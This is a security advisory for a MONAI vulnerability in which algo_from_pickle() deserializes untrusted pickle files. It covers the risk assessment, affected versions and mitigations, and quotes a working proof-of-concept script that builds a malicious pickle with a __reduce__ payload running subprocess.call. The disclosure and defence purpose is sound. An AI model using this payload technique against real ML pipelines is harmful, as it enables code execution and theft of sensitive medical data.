MONAI's Auto3DSeg module deserializes pickle files via algo_from_pickle() with zero input validation, allowing any actor who can supply a crafted .pkl file to achieve arbitrary code execution with ML pipeline privileges. With 99 downstream dependents and MONAI widely deployed in clinical and research medical imaging workflows, the blast radius is significant — a single poisoned algorithm checkpoint can cascade to full host compromise including access to sensitive patient imaging datasets. Although the CVSS vector rates attack complexity as high and requires privileged access and user interaction, the actual exploit payload is a five-line Python script using only the standard library, making weaponization trivial once an attacker influences which files the pipeline loads. Patch immediately to MONAI 1.5.2; in the interim, enforce strict write-access controls on all directories containing .pkl files consumed by auto3dseg pipelines.
Risk Assessment
High severity with critical-when-triggered impact profile: CVSS scope change plus C:H/I:H/A:H means full system compromise including data exfiltration and persistence when conditions are met. The AC:H and PR:H ratings reduce opportunistic exploitation likelihood, but insider threats, shared-storage poisoning, and supply chain scenarios in research GPU clusters are highly plausible. No EPSS data, not in CISA KEV, no public exploit tool yet — but the advisory's PoC is trivially reproducible. Medical imaging AI environments processing protected health information face compounded regulatory exposure under HIPAA alongside the technical risk.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| monai | pip | <= 1.5.1 | 1.5.2 |
Do you use monai? You're affected.
Severity & Risk
Recommended Action
- Upgrade monai to >=1.5.2 immediately — the official patch is available as of 2026-04-05.
- Audit all direct and transitive calls to algo_from_pickle() across your codebase, Jupyter notebooks, and CI/CD pipelines.
- Until patched, restrict write access to directories from which .pkl files are loaded to only the owning process account — deny write access for all other identities.
- Implement SHA-256 manifest files with cryptographic signatures for all serialized algorithm artifacts; verify before loading.
- Consider migrating algorithm persistence to safe serialization formats (JSON configs + safetensors weights) for new pipelines.
- Add SIEM/EDR rules to alert on subprocess execution spawned by Python ML training processes — this is the primary post-exploitation indicator.
Classification
Compliance Impact
This CVE is relevant to:
Technical Details
NVD Description
### Summary The `algo_from_pickle` function in `monai/auto3dseg/utils.py` causes `pickle.loads(data_bytes)` to be executed, and it does not perform any validation on the input parameters. This ultimately leads to insecure deserialization and can result in code execution vulnerabilities. ### Details poc ``` import pickle import subprocess class MaliciousAlgo: def __reduce__(self): return (subprocess.call, (['calc.exe'],)) malicious_algo_bytes = pickle.dumps(MaliciousAlgo()) attack_data = { "algo_bytes": malicious_algo_bytes, } attack_pickle_file = "attack_algo.pkl" with open(attack_pickle_file, "wb") as f: f.write(pickle.dumps(attack_data)) ``` Generate the malicious file "attack_algo.pkl" through POC. ``` from monai.auto3dseg.utils import algo_from_pickle attack_pickle_file = "attack_algo.pkl" result = algo_from_pickle(attack_pickle_file) ``` Ultimately, it will trigger pickle.load through a file to identify the command execution. <img width="909" height="534" alt="image" src="https://github.com/user-attachments/assets/071adbb7-3e40-4651-be48-abd2ce32470f" /> Causes of the vulnerability: ``` def algo_from_pickle(pkl_filename: str, template_path: PathLike | None = None, **kwargs: Any) -> Any: with open(pkl_filename, "rb") as f_pi: data_bytes = f_pi.read() data = pickle.loads(data_bytes) ``` ### Impact Arbitrary code execution Repair suggestions Verify the data source and content before deserializing, or use a safe deserialization method
Exploitation Scenario
An adversary with write access to a shared NAS, S3 bucket, or MLflow artifact store used by an Auto3DSeg hyperparameter optimization cluster crafts a malicious .pkl file using the published PoC — a subprocess.call payload wrapped in a Python class with a custom __reduce__ method. When the automated training pipeline or an ML engineer calls algo_from_pickle() to resume an experiment or load a previously searched algorithm configuration, the payload deserialized silently executes: a reverse shell is established, GPU cluster credentials are harvested, and model weights alongside DICOM training data are exfiltrated to attacker-controlled storage. In air-gapped clinical AI environments, this same attack vector can be delivered via a compromised developer workstation or poisoned shared experiment artifact committed to a collaborative repository.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H References
Timeline
Related Vulnerabilities
CVE-2025-58757 8.8 MONAI: unsafe pickle deserialization RCE in data pipeline
Same package: monai CVE-2025-58755 8.8 MONAI: path traversal allows arbitrary file write
Same package: monai CVE-2025-58756 8.8 MONAI: unsafe deserialization in CheckpointLoader allows RCE
Same package: monai CVE-2026-21851 5.3 monai: Path Traversal enables file access
Same package: monai CVE-2024-2912 10.0 BentoML: RCE via insecure deserialization (CVSS 10)
Same attack type: Supply Chain
AI Threat Alert